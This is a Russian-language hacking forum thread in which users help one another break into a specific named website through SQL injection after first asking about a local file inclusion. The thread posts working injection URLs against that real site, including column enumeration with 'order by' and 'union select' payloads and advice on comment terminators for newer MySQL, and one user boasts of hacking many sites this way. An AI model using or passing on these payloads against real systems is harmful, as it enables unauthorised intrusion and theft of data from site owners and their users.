Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?

пробуй +order+by+5000000 --
либо без плюсов, просто пробелы. Либо +group+by+1 -- и т.д.

вобщем вот: http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4--
а если вести http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4/* , то уже совсем другое вылазиет)

полей вроде 4

+group+by+1 вроде ошибок нет)

что дальше делать ?)))

http://cod5.nov.ru/serverstats.php?serverid=1+order+by+4-- - почувствуй разницу вот http://cod5.nov.ru/serverstats.php?serverid=1+order+by+5-- ???? НУ как??? А то хрень, что написал "Ghost0ff" все БРЕЕЕЕЕДДДД!!! Все делается Э Л Е М Е Н Т А Р Н О ! Можно и без group by !! Главное правильно поставить ' и - ! Практический все сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - ! Ну это обычно в твоем случае ничего ставить ненадо! Насчет поста "geforse" ты знаешь скорей самое простое это вообще ничего не ставить после "4" ))) Воть так http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4 - удачи))

И зачем так нужно делать? Особенно если учесть что это не правильно.
Так нужно делать только потому что ты не знаком с синтаксисом SQL?

Хммм в большенстве случаев этот вариант прокатывает!!!

Гениально! Главное сказать и не важно что не правильно.
Оператор order by сортирует результат запроса, а отсортировывать пустой результат (а со значением -1 другого и не будет) - не самая лучшая идея.
Использовать order by нужно только при существующих значениях.

Ошибка в данном случае была в использование /* - в новых версиях мускула нельзя не закрывать этот комментарий, а значит теперь обходимся комментариями '#' и '-- '.

Скул инж. я еще хоть как нить знаю но вот с PHP может кто нибуть поможет???

Почитай здесь:
http://forum.antichat.ru/thread12123.html